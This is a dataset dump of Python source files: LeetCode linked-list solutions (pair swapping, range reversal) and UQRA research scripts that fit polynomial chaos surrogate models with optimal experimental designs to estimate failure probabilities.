metadata (dict) | text (string, lengths 60 – 3.49M) |
---|---|
{
"source": "jinsim/python-leetcode",
"score": 4
} |
#### File: Linear/LinkedList/17_swap_nods_in_pairs.py
```python
class ListNode:
def __init__(self, val=0, next=None):
self.val = val
self.next = next
class Solution:
    # Swap values only
def swapPairs1(self, head: ListNode) -> ListNode:
cur = head
while cur and cur.next:
cur.val, cur.next.val = cur.next.val, cur.val
cur = cur.next.next
return head
"""다만, 좋지 않은 피드백을 받을 수 있다. 빠르고 쉬운 풀이를 위해서만이다. """
    # Swap by re-linking nodes iteratively
def swapPairs2(self, head: ListNode) -> ListNode:
root = prev = ListNode(None)
prev.next = head
while head and head.next:
b = head.next
head.next = b.next
b.next = head
prev.next = b
head = head.next
prev = prev.next.next
return root.next
"""그 앞뒤 연결 리스트도 다 수정해야한다. """
    # Swap by re-linking nodes recursively (much cleaner)
def swapPairs3(self, head: ListNode) -> ListNode:
if head and head.next:
            # Set a pointer p to the node after head
p = head.next
            # Recurse on the node after p and use the return value as head's next,
            # because head moves back and must connect to the next (already swapped) pair.
head.next = self.swapPairs3(p.next)
            # Point p's next to head (the two nodes have now swapped places).
p.next = head
            # Return p, since it now comes first.
return p
return head
```
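A minimal driver sketch (not part of the original file) for the recursive solution, assuming the `ListNode` and `Solution` classes above; `build` and `to_list` are hypothetical helpers added only for illustration:
```python
# Hypothetical helpers for illustration only; ListNode and Solution are the classes above.
def build(values):
    head = tail = ListNode(values[0])
    for v in values[1:]:
        tail.next = ListNode(v)
        tail = tail.next
    return head

def to_list(head):
    out = []
    while head:
        out.append(head.val)
        head = head.next
    return out

swapped = Solution().swapPairs3(build([1, 2, 3, 4]))
print(to_list(swapped))  # expected: [2, 1, 4, 3]
```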
#### File: Linear/LinkedList/19_reverse_linked_list_2.py
```python
class ListNode:
def __init__(self, val=0, next=None):
self.val = val
self.next = next
class Solution:
    # Reverse nodes iteratively
def reverseBetween(self, head: ListNode, left: int, right: int) -> ListNode:
        # Handle edge cases
if not head or left == right:
return head
root = start = ListNode(None)
root.next = head
        # Set the start and end pointers
for _ in range(left - 1):
start = start.next
end = start.next
for _ in range(right-left):
            # Save start.next in tmp, point start at the node right after end,
            # and point end at the node two past it. Finally, re-link the node now
            # following start back to tmp (the old start.next).
tmp, start.next, end.next = start.next, end.next, end.next.next
start.next.next = tmp
return root.next
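# Hypothetical usage sketch (not in the original file):
# reversing positions 2..4 of 1->2->3->4->5 should give 1->4->3->2->5.
if __name__ == '__main__':
    nodes = [ListNode(v) for v in (1, 2, 3, 4, 5)]
    for a, b in zip(nodes, nodes[1:]):
        a.next = b
    head = Solution().reverseBetween(nodes[0], 2, 4)
    vals = []
    while head:
        vals.append(head.val)
        head = head.next
    print(vals)  # expected: [1, 4, 3, 2, 5]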
``` |
{
"source": "Jinsongl/UQRA",
"score": 2
} |
#### File: UQRA/examples/Benchmark_PCE.py
```python
import uqra
import numpy as np, os, sys
import scipy.stats as stats
from tqdm import tqdm
import itertools, copy, math
import multiprocessing as mp
# warnings.filterwarnings(action="ignore", module="scipy", message="^internal gelsd")
sys.stdout = uqra.utilities.classes.Logger()
class Data():
pass
def observation_error(y, mu=0, cov=0.03, random_state=100):
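    """Multiplicative Gaussian observation noise: each entry e_i ~ Normal(mean=0, std=cov*|y_i|).
    Note (added): the `mu` argument is accepted but not used by the current implementation."""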
e = stats.norm(0, cov * abs(y)).rvs(size=len(y), random_state=random_state)
return e
def main(s=0):
## ------------------------ Displaying set up ------------------- ###
print('\n#################################################################################')
print(' >>> Start UQRA : {:d}'.format(s), __file__)
print('#################################################################################\n')
np.random.seed(100)
np.set_printoptions(precision=4)
np.set_printoptions(threshold=8)
np.set_printoptions(suppress=True)
pf = np.array([1e-4])
## ------------------------ Define solver ----------------------- ###
# solver = uqra.ExpAbsSum(stats.uniform(-1,2),d=2,c=[-2,1],w=[0.25,-0.75])
# solver = uqra.ExpSquareSum(stats.uniform(-1,2),d=2,c=[1,1],w=[1,0.5])
# solver = uqra.CornerPeak(stats.uniform(-1,2), d=2)
# solver = uqra.ProductPeak(stats.uniform(-1,2), d=2,c=[-3,2],w=[0.5,0.5])
# solver = uqra.Franke()
# solver = uqra.Ishigami()
# solver = uqra.ExpAbsSum(stats.norm(0,1),d=2,c=[-2,1],w=[0.25,-0.75])
# solver = uqra.ExpSquareSum(stats.norm(0,1),d=2,c=[1,1],w=[1,0.5])
# solver = uqra.CornerPeak(stats.norm(0,1), d=3, c=np.array([1,2,3]), w=[0.5,]*3)
# solver = uqra.ProductPeak(stats.norm(0,1), d=2, c=[-3,2], w=[0.5,]*2)
# solver = uqra.ExpSum(stats.norm(0,1), d=3)
solver = uqra.FourBranchSystem()
uqra_env = solver.distributions[0]
## ------------------------ UQRA Modeling Parameters ----------------- ###
model_params = uqra.Modeling()
model_params.name = 'PCE'
model_params.degs = np.arange(2,8) #[2,6,10]#
model_params.ndim = solver.ndim
model_params.basis = 'Hem'
model_params.fitting = 'OLS'
model_params.n_splits= 50
model_params.alpha = 2
model_params.num_test= int(1e6)
model_params.num_pred= int(1e7)
model_params.info()
## ------------------------ UQRA DOE Parameters ----------------- ###
doe_params = uqra.ExperimentParameters()
doe_params.doe_sampling = 'CLS4'
doe_params.optimality = ['S']
doe_params.poly_name = model_params.basis
doe_params.num_cand = int(1e5)
# data_dir_cand = '/Users/jinsongliu/BoxSync/Research/Working_Papers/OE2020_LongTermExtreme/Data/FPSO_SURGE/UniformBall'
if doe_params.doe_sampling.lower() == 'lhs':
data_dir_optimal = '/Volumes/GoogleDrive/My Drive/MUSE_UQ_DATA/ExperimentalDesign/LHS'
doe_params.update_output_dir(data_dir_optimal=data_dir_optimal)
# with mp.Pool(processes=mp.cpu_count()) as p:
# y0_ecdf= list(tqdm(p.imap(uqra.ECDF, [(uqra.bootstrapping(data_pred.y, 1, bootstrap_size=model_params.num_pred), pf, True) for _ in range(10)]), ncols=80, total=10, desc=' [Boostraping]'))
# print(y0_ecdf)
u_train = np.empty((solver.ndim,0))
x_train = np.empty((solver.ndim,0))
y_train = np.empty((0))
ndim_deg_cases = np.array(list(itertools.product([model_params.ndim,], model_params.degs)))
output_ndim_deg= []
for ndim, deg in ndim_deg_cases:
print(' ----------------------------------------------------------------------------------')
print(' ----------------------------------------------------------------------------------')
## ------------------------ UQRA Surrogate model----------------- ###
orth_poly = uqra.poly.orthogonal(ndim, deg, model_params.basis)
pce_model = uqra.PCE(orth_poly)
pce_model.info()
## ------------------------ Updating DoE parameters ----------------- ###
idoe_params = copy.deepcopy(doe_params)
idoe_params.ndim = ndim
idoe_params.deg = int(deg)
## Specify filename template function
# filename_template= lambda s: r'DoE_Ball5pt6E5R{:d}'.format(s)
# idoe_params.update_filenames(s, filename_template)
## If not specified, default values will be used
idoe_params.update_filenames(s)
        ### return data directories and filenames
filename_cand = idoe_params.fname_cand
data_dir_cand = idoe_params.data_dir_cand
data_dir_optimal= idoe_params.data_dir_optimal
## ------------------------ UQRA Simulation Parameters ----------------- ###
sim_params = uqra.Simulation(solver, pce_model, idoe_params)
sim_params.update_filenames(s)
filename_testin = sim_params.fname_testin
filename_test = sim_params.fname_test
data_dir_test = sim_params.data_dir_test
data_dir_testin = sim_params.data_dir_testin
data_dir_result = sim_params.data_dir_result
figure_dir = sim_params.figure_dir
print(' > {:<25s}'.format('Input/Output Directories:'))
        print(' - {:<23s} : {:s}'.format(' Candidate samples' , data_dir_cand))
print(' - {:<23s} : {:s}'.format(' UQRA DoE data ' , data_dir_optimal))
print(' - {:<23s} : {:s}'.format(' Test input ' , data_dir_testin))
print(' - {:<23s} : {:s}'.format(' Test output' , data_dir_test))
print(' - {:<23s} : {:s}'.format(' UQRA output data ' , data_dir_result))
print(' - {:<23s} : {:s}'.format(' UQRA output figure', figure_dir))
print(' > {:<25s}'.format('Input/Output files'))
        print(' - {:<23s} : {}'.format(' Candidate samples' , filename_cand ))
print(' - {:<23s} : {}'.format(' Test input data' , filename_testin))
print(' - {:<23s} : {}'.format(' Test output data' , filename_test ))
if filename_cand:
data_cand = np.load(os.path.join(data_dir_cand, filename_cand))[:ndim, :]
print(' ..{:<30s} shape: {}'.format(' Candidate samples loaded,', data_cand.shape))
### 2. Get test data set
try:
data_test = np.load(os.path.join(data_dir_test, filename_test), allow_pickle=True).tolist()
if isinstance(data_test, uqra.Data):
pass
else:
data_test = data_test[0]
assert isinstance(data_test, (Data, uqra.Data)), 'Type: {}'.format(type(data_test))
except FileNotFoundError:
print(' - Preparing Test data (UQRA.Solver: {:s})... '.format(solver.nickname))
filename_testin = os.path.join(data_dir_cand, filename_testin)
print(' .. Input test data:', filename_testin)
data_test = uqra.Data()
data_test.u = np.load(filename_testin)[:ndim, :model_params.num_test]
if doe_params.doe_sampling.lower() == 'cls4':
data_test.xi = data_test.u* np.sqrt(0.5)
else:
data_test.xi = data_test.u
data_test.x = uqra_env.ppf(stats.norm.cdf(data_test.u))
data_test.y = solver.run(data_test.x)
np.save(os.path.join(data_dir_test, filename_test), data_test, allow_pickle=True)
print(' .. Saving test data to {:s}, shape: x={}, y={} '.format(filename_test,
data_test.x.shape, data_test.y.shape))
print(' ..{:<30s} shape: {} '.format(' Test data loaded,', data_test.y.shape))
## ECDF, quantile values based on test data
data_pred = np.load(os.path.join(data_dir_test, '{:s}_CDF_McsE6R{:d}.npy'.format(solver.nickname, s)), allow_pickle=True).tolist()
data_pred_ecdf = np.load(os.path.join(data_dir_test, '{:s}_McsE7_Ecdf.npy'.format(solver.nickname)), allow_pickle=True).tolist()
output_indim_ideg = uqra.Data()
if idoe_params.doe_sampling.lower() == 'lhs':
all_doe_cases = [(idoe_params.doe_sampling, None)]
else:
all_doe_cases = [(idoe_params.doe_sampling, ioptimality) for ioptimality in idoe_params.optimality]
for idoe_sampling, ioptimality in all_doe_cases:
idoe_sampling = idoe_sampling.lower()
idoe_nickname = idoe_params.doe_nickname(idoe_sampling, ioptimality)
n_samples = model_params.alpha * pce_model.num_basis
print(' --------------------------------------------------------------------------------')
print(' >> UQRA Training with Experimental Design {} '.format(idoe_nickname))
print(' -> Training with (n={:d}, alpha={:.2f}) samples'.format(n_samples, model_params.alpha))
if idoe_sampling.lower() == 'lhs':
filename_design = idoe_params.fname_design(n_samples)
else:
filename_design = idoe_params.fname_design
print(' - {:<23s} : {}'.format(' UQRA DoE filename' , filename_design))
data_design = np.load(os.path.join(data_dir_optimal, filename_design), allow_pickle=True).tolist()
print(' ..{:<23s} : {}'.format(' # optimal sample sets,', len(data_design)))
            ### if data_design has more than one set of optimal samples, choose the first one
if isinstance(data_design, list):
data_design = data_design[0]
if idoe_sampling.lower() == 'lhs':
data_design = np.array(data_design)
assert data_design.shape == (ndim, n_samples)
u_train_ = data_design
else:
assert isinstance(data_design, (Data, uqra.Data)),'TypeError: expected uqra.Data, but {} given'.format(type(data_design))
assert data_design.deg == deg and data_design.ndim == model_params.ndim
optimal_samples_idx = getattr(data_design, idoe_nickname)
if len(optimal_samples_idx) < n_samples:
raise ValueError(' Requesting {:d} samples but only {:d} available...'.format(
n_samples, len(optimal_samples_idx)))
u_train_ = data_cand[:model_params.ndim, optimal_samples_idx[:n_samples]]
if idoe_sampling.lower()=='cls4':
u_train_ = u_train_ * deg **0.5
x_train_ = uqra_env.ppf(pce_model.orth_poly.dist_u.cdf(u_train_))
y_train_ = solver.run(x_train_)
# y_train = y_train + observation_error(y_train)
### 3. train model
# u_train = np.concatenate((u_train, u_train_), axis=-1)
# x_train = np.concatenate((x_train, x_train_), axis=-1)
# y_train = np.concatenate((y_train, y_train_), axis=-1)
u_train = u_train_
x_train = x_train_
y_train = y_train_
U_train = pce_model.orth_poly.vandermonde(u_train)
print(' Train Data U: {}'.format(u_train.shape))
print(' Train Data X: {}'.format(x_train.shape))
print(' Train Data y: {}'.format(y_train.shape))
# X_train = orth_poly.vandermonde(x_train)
if idoe_sampling.lower().startswith('cls'):
### reproducing kernel
WU_train = pce_model.orth_poly.num_basis**0.5*(U_train.T / np.linalg.norm(U_train, axis=1)).T
w = pce_model.christoffel_weight(u_train, active=None)
else:
WU_train = U_train
w = None
## condition number, kappa = max(svd)/min(svd)
_, sigular_values, _ = np.linalg.svd(WU_train)
if idoe_sampling.lower().startswith('cls'):
u_test = data_test.xi
u_pred = data_pred.xi[:,:model_params.num_pred]
elif idoe_sampling.lower().startswith('mcs'):
u_test = data_test.u
u_pred = data_pred.u[:,:model_params.num_pred]
elif idoe_sampling.lower() == 'lhs':
u_test = data_test.u
u_pred = data_pred.u[:,:model_params.num_pred]
# pce_model.fit_lassolars(u_train, y_train, w=w)
data = uqra.Data()
data.kappa = max(abs(sigular_values)) / min(abs(sigular_values))
pce_model.fit(model_params.fitting, u_train, y_train, w=w, n_jobs=4)
y_test = pce_model.predict(u_test, n_jobs=4)
y_pred = pce_model.predict(u_pred, n_jobs=4)
data.rmse_y = uqra.metrics.mean_squared_error(data_test.y, y_test, squared=False)
data.model = pce_model
data.y0_hat = uqra.metrics.mquantiles(y_pred, prob=1-pf)
print(uqra.metrics.mquantiles(y_test, prob=1-pf))
print(uqra.metrics.mquantiles(y_pred, prob=1-pf))
print(uqra.metrics.mquantiles(solver.run(data_pred.x), prob=1-pf))
data.ypred_ecdf = uqra.ECDF(y_pred, alpha=pf, compress=True)
# data.y0_ecdf=y0_ecdf
data.score = pce_model.score
data.cv_error = pce_model.cv_error
print(pce_model.coef)
tqdm.write(' > Summary')
with np.printoptions(precision=4):
# tqdm.write(' - {:<15s} : {}'.format( 'QoI' , QoI))
tqdm.write(' - {:<15s} : {}'.format( 'RMSE y ' , data.rmse_y))
tqdm.write(' - {:<15s} : {}'.format( 'CV MSE' , data.cv_error))
tqdm.write(' - {:<15s} : {}'.format( 'Score ' , data.score))
tqdm.write(' - {:<15s} : {}'.format( 'kappa ' , data.kappa))
tqdm.write(' - {:<15s} : {} [{}]'.format( 'y0 ' , data.y0_hat, data_pred_ecdf.y0[s]))
setattr(output_indim_ideg, idoe_nickname, data)
output_ndim_deg.append(output_indim_ideg)
## ============ Saving QoIs ============
filename = '{:s}_{:s}_{:s}E5R{:d}'.format(solver.nickname, pce_model.tag, doe_params.doe_sampling.capitalize(), s)
try:
np.save(os.path.join(data_dir_result, filename), output_ndim_deg, allow_pickle=True)
print(' >> Simulation Done! Data saved to {:s}'.format(os.path.join(data_dir_result, filename)))
except:
np.save(os.path.join(os.getcwd(), filename), output_ndim_deg, allow_pickle=True)
print(' >> Simulation Done! Data saved to {:s}'.format(os.path.join(os.getcwd(), filename)))
if __name__ == '__main__':
main(0)
```
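The two diagnostics the script reports, the design-matrix condition number `kappa = max(svd)/min(svd)` and the exceedance quantile at probability `1-pf`, reduce to standard NumPy/SciPy calls. A minimal self-contained sketch with synthetic stand-in data (not the UQRA API):
```python
import numpy as np
from scipy.stats import mstats

rng = np.random.default_rng(100)

# Condition number of a (weighted) design matrix, kappa = max(svd)/min(svd)
WU = rng.normal(size=(200, 15))              # stand-in for the Vandermonde matrix WU_train
singular_values = np.linalg.svd(WU, compute_uv=False)
kappa = singular_values.max() / singular_values.min()

# Empirical exceedance value y0 at probability pf, analogous to mquantiles(y_pred, 1-pf)
pf = 1e-4
y_pred = rng.normal(size=1_000_000)          # stand-in for surrogate predictions
y0_hat = mstats.mquantiles(y_pred, prob=1 - pf)
print(kappa, y0_hat)
```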
#### File: UQRA/examples/CompositeGaussian_AdapSPCE.py
```python
import uqra
import numpy as np, os, sys
import scipy.stats as stats
from tqdm import tqdm
import itertools, copy, math, collections
import multiprocessing as mp
# warnings.filterwarnings(action="ignore", module="scipy", message="^internal gelsd")
sys.stdout = uqra.utilities.classes.Logger()
class Data():
pass
def observation_error(y, mu=0, cov=0.03, random_state=100):
e = stats.norm(0, cov * abs(y)).rvs(size=len(y), random_state=random_state)
return e
def run_UQRA_OptimalDesign(x, poly, doe_sampling, optimality, n_samples, optimal_samples=[], active_index=None):
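    """
    Descriptive note (added): select `n_samples` new optimal-design indices from the candidate set `x`.
      x               : candidate samples in the polynomial (xi) space, shape (ndim, n_cand)
      poly            : orthogonal polynomial basis object (provides deg, num_basis, vandermonde)
      doe_sampling    : sampling scheme name; 'CLS4'/'CLS5' rescale x by sqrt(deg), and any 'CLS*'
                        scheme also normalizes the rows of the design matrix
      optimality      : optimality criterion passed to uqra.OptimalDesign.samples (e.g. 'S')
      n_samples       : number of new samples to select
      optimal_samples : indices already selected; used to initialize the design and excluded
                        from the returned indices ('RRQR' initialization when empty)
      active_index    : if given, restrict the design matrix to these basis columns
    Returns a list of `n_samples` new candidate indices.
    """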
optimal_samples = 'RRQR' if len(optimal_samples) == 0 else copy.deepcopy(optimal_samples)
x = poly.deg**0.5 * x if doe_sampling.lower() in ['cls4', 'cls5'] else x
if doe_sampling.lower().startswith('cls'):
X = poly.vandermonde(x)
X = poly.num_basis**0.5*(X.T / np.linalg.norm(X, axis=1)).T
else:
X = poly.vandermonde(x)
if active_index is None:
X = X
else:
X = X[:, active_index]
uqra.blockPrint()
doe = uqra.OptimalDesign(X)
idx = doe.samples(optimality, n_samples, initialization=optimal_samples) ## additional n_samples new samples
uqra.enablePrint()
if isinstance(optimal_samples, (list, tuple)):
idx = [i for i in idx if i not in optimal_samples]
assert len(idx) == n_samples
return idx
def isOverfitting(cv_err):
if len(cv_err) < 3 :
return False
if cv_err[-1] > cv_err[-2] and cv_err[-2] > cv_err[0]:
print('WARNING: Overfitting')
return False
def isConverge(pf, abs_tol=1e-4):
if len(pf) < 2:
return False
if abs(pf[-2]-pf[-1]) > abs_tol:
return False
else:
return True
def check_converge(pf, abs_tol=1e-4):
"""
    Return (status, converged pf or the raw pf list, absolute change between the last two estimates)
"""
is_converge = isConverge(pf, abs_tol)
if len(pf) >= 2:
abs_err = abs(pf[-2]-pf[-1])
else:
abs_err = None
if is_converge:
res = (True, pf[-1], abs_err)
else:
res = (False, pf , abs_err)
return res
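# Example of the convergence check (added for illustration):
#   check_converge([1.20e-4, 1.25e-4], abs_tol=1e-4) -> (True, 1.25e-04, ~5e-06)
#   check_converge([1.20e-4])                        -> (False, [1.20e-4], None)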
# def isConverge(y0, pf, e=0.025, abs_tol=1e-4):
# if len(y0) < 2 or len(pf) < 2:
# return False
# if abs(y0[-2]-y0[-1])/abs(y0[-2]) > e:
# return False
# elif abs(pf[-2]-pf[-1]) > abs_tol:
# return False
# else:
# return True
# def check_converge(y0, e=0.025):
# """
# Return Y/N, converged y0/ raw y0, relative changes
# """
# is_converge = isConverge(y0, e)
# if len(y0) >= 2:
# rel_change = abs(y0[-2]-y0[-1])/abs(y0[-2])
# else:
# rel_change = None
# if is_converge:
# res = (True, y0[-1], rel_change)
# else:
# res = (False,y0 , rel_change)
# return res
def main(r=0):
## ------------------------ Displaying set up ------------------- ###
print('\n#################################################################################')
print(' >>> Start UQRA : {:d}'.format(r), __file__)
print('#################################################################################\n')
np.random.seed(100)
np.set_printoptions(precision=4)
np.set_printoptions(threshold=1000)
np.set_printoptions(suppress=True)
pf = np.array([1.26e-4])
n_jobs = mp.cpu_count()
## ------------------------ Define solver ----------------------- ###
# solver = uqra.ExpAbsSum(stats.uniform(-1,2),d=2,c=[-2,1],w=[0.25,-0.75])
# solver = uqra.ExpSquareSum(stats.uniform(-1,2),d=2,c=[1,1],w=[1,0.5])
# solver = uqra.CornerPeak(stats.uniform(-1,2), d=2)
# solver = uqra.ProductPeak(stats.uniform(-1,2), d=2,c=[-3,2],w=[0.5,0.5])
# solver = uqra.Franke()
# solver = uqra.Ishigami()
# solver = uqra.ExpAbsSum(stats.norm(0,1),d=2,c=[-2,1],w=[0.25,-0.75])
# solver = uqra.ExpSquareSum(stats.norm(0,1),d=2,c=[1,1],w=[1,0.5])
# solver = uqra.CornerPeak(stats.norm(0,1), d=3, c=np.array([1,2,3]), w=[0.5,]*3)
# solver = uqra.ProductPeak(stats.norm(0,1), d=2, c=[-3,2], w=[0.5,]*2)
# solver = uqra.ExpSum(stats.norm(0,1), d=3)
# solver = uqra.FourBranchSystem()
solver = uqra.CompositeGaussian()
## ------------------------ UQRA Modeling Parameters ----------------- ###
model_params = uqra.Modeling()
model_params.name = 'PCE'
model_params.degs = np.arange(1,15) #[2,6,10]#
model_params.ndim = solver.ndim
model_params.basis = 'Hem'
model_params.fitting = 'OLSLAR'
model_params.n_splits= 50
model_params.alpha = 2
model_params.num_test= int(1e7)
model_params.num_pred= int(1e7)
model_params.info()
## ------------------------ UQRA DOE Parameters ----------------- ###
doe_params = uqra.ExperimentParameters()
doe_params.doe_sampling = 'CLS4'
doe_params.optimality = ['S']
doe_params.poly_name = model_params.basis
doe_params.num_cand = int(1e5)
# data_dir_cand = '/Users/jinsongliu/BoxSync/Research/Working_Papers/OE2020_LongTermExtreme/Data/FPSO_SURGE/UniformBall'
if doe_params.doe_sampling.lower() == 'lhs':
data_dir_optimal = '/Volumes/GoogleDrive/My Drive/MUSE_UQ_DATA/ExperimentalDesign/LHS'
doe_params.update_output_dir(data_dir_optimal=data_dir_optimal)
optimal_samples = []
ndim_deg_cases = np.array(list(itertools.product([model_params.ndim,], model_params.degs)))
output_ndim_deg = []
deg_stop_cv_err = []
# deg_stop_y0_hat = []
deg_stop_pf_hat = []
for ndim, deg in ndim_deg_cases:
print(' ==================================================================================')
print(' ==================================================================================')
## ------------------------ UQRA Surrogate model----------------- ###
orth_poly = uqra.poly.orthogonal(ndim, deg, model_params.basis)
pce_model = uqra.PCE(orth_poly)
if orth_poly.dist_name.lower() == 'norm':
dist_u = stats.norm()
elif orth_poly.dist_name.lower() == 'uniform':
dist_u = stats.uniform(-1,2)
else:
raise ValueError(' {} not defined'.format(orth_poly.dist_name))
dist_xi = orth_poly.dist_u
dist_x = solver.distributions
pce_model.info()
## ------------------------ Updating DoE parameters ----------------- ###
idoe_params = copy.deepcopy(doe_params)
idoe_params.ndim = ndim
idoe_params.deg = int(deg)
## Specify filename template function
# idoe_params.update_filenames(r, filename_template)
## If not specified, default values will be used
idoe_params.update_filenames(r)
        ### return data directories and filenames
filename_cand = idoe_params.fname_cand
data_dir_cand = idoe_params.data_dir_cand
data_dir_optimal= idoe_params.data_dir_optimal
## ------------------------ UQRA Simulation Parameters ----------------- ###
sim_params = uqra.Simulation(solver, pce_model, idoe_params)
filename_test = lambda r: r'McsE7R{:d}'.format(r)
sim_params.update_filenames(r, filename_test)
filename_testin = sim_params.fname_testin
filename_test = sim_params.fname_test
data_dir_result = sim_params.data_dir_result
figure_dir = sim_params.figure_dir
data_dir_test = sim_params.data_dir_test
data_dir_testin = sim_params.data_dir_testin
print(' > {:<25s}'.format('Input/Output Directories:'))
        print(' - {:<23s} : {:s}'.format(' Candidate samples' , data_dir_cand))
print(' - {:<23s} : {:s}'.format(' UQRA DoE data ' , data_dir_optimal))
print(' - {:<23s} : {:s}'.format(' Test input ' , data_dir_testin))
print(' - {:<23s} : {:s}'.format(' Test output' , data_dir_test))
print(' - {:<23s} : {:s}'.format(' UQRA output data ' , data_dir_result))
print(' - {:<23s} : {:s}'.format(' UQRA output figure', figure_dir))
print(' > {:<25s}'.format('Input/Output files'))
        print(' - {:<23s} : {}'.format(' Candidate samples' , filename_cand ))
print(' - {:<23s} : {}'.format(' Test input data' , filename_testin))
print(' - {:<23s} : {}'.format(' Test output data' , filename_test ))
if filename_cand:
data_cand = np.load(os.path.join(data_dir_cand, filename_cand))[:ndim, :idoe_params.num_cand]
print(' ..{:<23s} : {}'.format(' Candidate samples', data_cand.shape))
### 2. Get test data set
data_test = np.load(os.path.join(data_dir_test, filename_test), allow_pickle=True).tolist()
print(data_test.__dict__.keys())
data_test.x = solver.map_domain(data_test.u, dist_u)
data_test.xi= data_test.u*0.5**0.5
data_test.y = solver.run(data_test.x)
u_test = data_test.xi[:, :model_params.num_test]
y_test = data_test.y
output_indim_ideg = uqra.Data()
if idoe_params.doe_sampling.lower() == 'lhs':
all_doe_cases = [(idoe_params.doe_sampling, None)]
else:
all_doe_cases = [(idoe_params.doe_sampling, ioptimality) for ioptimality in idoe_params.optimality]
for idoe_sampling, ioptimality in all_doe_cases:
idoe_sampling = idoe_sampling.lower()
idoe_nickname = idoe_params.doe_nickname(idoe_sampling, ioptimality)
print(' --------------------------------------------------------------------------------')
print(' >> UQRA Training with Experimental Design {} '.format(idoe_nickname))
            ### temp data object containing results from intermediate steps
data_temp= uqra.Data()
# data_temp.y0_hat = []
data_temp.pf_hat = []
data_temp.cv_err = []
data_temp.kappa = []
data_temp.rmse_y = []
data_temp.model = []
data_temp.score = []
data_temp.ypred_ecdf=[]
optimal_samples_ideg=[]
print(' 1. Optimal samples based on FULL basis')
n_samples = 5*(deg == model_params.degs[0])+orth_poly.num_basis
print(' - {:s}: adding {:d} optimal samples'.format(idoe_nickname, n_samples))
idx = run_UQRA_OptimalDesign(data_cand, orth_poly, idoe_sampling, ioptimality, n_samples)
optimal_samples_ideg = optimal_samples_ideg + idx
optimal_samples = optimal_samples + idx
assert n_samples == len(idx)
print(' - # optimal samples [p={:d}]: {:d}'.format(deg, len(optimal_samples_ideg)))
print(' - Total number of optimal samples: {:d}'.format(len(optimal_samples)))
print(' - {:s} with (n={:d}, alpha={:.2f}) samples'.format(model_params.fitting.upper(),
len(optimal_samples), len(optimal_samples)/orth_poly.num_basis))
u_train = data_cand[:, optimal_samples]
if idoe_sampling.lower()=='cls4':
u_train = u_train * deg **0.5
x_train = solver.map_domain(u_train, dist_xi)
y_train = solver.run(x_train)
# y_train = y_train + observation_error(y_train)
## condition number, kappa = max(svd)/min(svd)
pce_model.fit(model_params.fitting, u_train, y_train, w=idoe_sampling, n_jobs=n_jobs)
y_test_hat = pce_model.predict(u_test, n_jobs=n_jobs)
data_temp.rmse_y.append(uqra.metrics.mean_squared_error(y_test, y_test_hat, squared=False))
data_temp.model.append(pce_model)
data_temp.pf_hat.append(np.sum(y_test_hat<0)/len(y_test_hat))
print(' pf test [PCE] : {:.4e}/{:d}'.format(np.sum(y_test_hat<0)/len(y_test_hat), len(y_test_hat)))
# print(' y0 pred [TRUE] : {:.4f}'.format(uqra.metrics.mquantiles(solver.run(data_pred.x), prob=1-pf)))
# data_temp.ypred_ecdf.append(uqra.ECDF(y_test_hat, alpha=pf, compress=True))
# data.y0_ecdf=y0_ecdf
data_temp.score.append(pce_model.score)
data_temp.cv_err.append(pce_model.cv_error)
is_converge, pf_hat, pf_hat_err = check_converge(data_temp.pf_hat, abs_tol=1e-4)
active_basis = pce_model.active_basis
active_index = pce_model.active_index
print(' - # Active basis: {:d}'.format(len(active_index)))
print(' > pf: {}, pf abs_err: {}'.format(np.array(data_temp.pf_hat), pf_hat_err))
print(' 2. Optimal samples based on SIGNIFICANT basis')
while True:
### increase number of samples by n_new
n_samples = len(active_index)
print(' - {:s}: Sparsity: {:d}, adding {:d} optimal samples'.format(
idoe_nickname,len(active_index),n_samples))
idx = run_UQRA_OptimalDesign(data_cand, orth_poly, idoe_sampling, ioptimality, n_samples,
optimal_samples=optimal_samples_ideg, active_index=active_index)
optimal_samples = optimal_samples + idx
optimal_samples_ideg = optimal_samples_ideg + idx
assert n_samples == len(idx)
print(' - # optimal samples [p={:d}]: {:d}'.format(deg, len(optimal_samples_ideg)))
print(' - Total number of optimal samples: {:d}'.format(len(optimal_samples)))
print(' - {:s} with (n={:d}, alpha={:.2f}) samples'.format(model_params.fitting.upper(),
len(optimal_samples), len(optimal_samples)/orth_poly.num_basis))
u_train = data_cand[:, optimal_samples]
if idoe_sampling.lower()=='cls4':
u_train = u_train * deg **0.5
x_train = solver.map_domain(u_train, dist_xi)
y_train = solver.run(x_train)
# y_train = y_train + observation_error(y_train)
# w = pce_model.christoffel_weight(u_train, active=active_index) if idoe_sampling.lower().startswith('cls') else None
pce_model.fit(model_params.fitting, u_train, y_train, w=idoe_sampling, n_jobs=n_jobs)
y_test_hat = pce_model.predict(u_test, n_jobs=n_jobs)
data_temp.rmse_y.append(uqra.metrics.mean_squared_error(y_test, y_test_hat, squared=False))
data_temp.model.append(pce_model)
data_temp.pf_hat.append(np.sum(y_test_hat<0)/len(y_test_hat))
print(' pf test [PCE] : {:.4e}/{:d}'.format(np.sum(y_test_hat<0)/len(y_test_hat), len(y_test_hat)))
# print(' y0 pred [TRUE] : {:.4f}'.format(uqra.metrics.mquantiles(solver.run(data_pred.x), prob=1-pf)))
# data_temp.ypred_ecdf.append(uqra.ECDF(y_test_hat, alpha=pf, compress=True))
# data.y0_ecdf=y0_ecdf
data_temp.score.append(pce_model.score)
data_temp.cv_err.append(pce_model.cv_error)
active_index = pce_model.active_index
active_basis = pce_model.active_basis
isOverfitting(data_temp.cv_err) ## check Overfitting
is_converge, pf_hat, pf_hat_err = check_converge(data_temp.pf_hat, abs_tol=1e-4)
print(' - # Active basis: {:d}'.format(len(active_index)))
print(' > pf: {}, pf abs_err: {}'.format(np.array(data_temp.pf_hat), pf_hat_err))
# print(' ==================================================' )
if is_converge:
print(' !<>! Model converge for order {:d}'.format(deg))
# print(' ==================================================' )
break
if len(optimal_samples_ideg)>=2*orth_poly.num_basis:
print(' !<>! Number of samples exceeding 2P')
# print(' ==================================================' )
break
deg_stop_cv_err.append(data_temp.cv_err[-1])
deg_stop_pf_hat.append(data_temp.pf_hat[-1])
data = uqra.Data()
data.ndim = ndim
data.deg = deg
data.u_train= u_train
data.x_train= x_train
data.y_train= y_train
data.rmse_y = data_temp.rmse_y[-1]
data.pf_hat = data_temp.pf_hat[-1]
# data.y0_hat_x = uqra_env.ppf(pce_model.orth_poly.dist_u.cdf(data.y0_hat_u.reshape(solver.ndim, -1)))
data.cv_err = data_temp.cv_err[-1]
data.model = data_temp.model[-1]
data.score = data_temp.score[-1]
# data.ypred_ecdf = data_temp.ypred_ecdf[-1]
print(' ------------------------------')
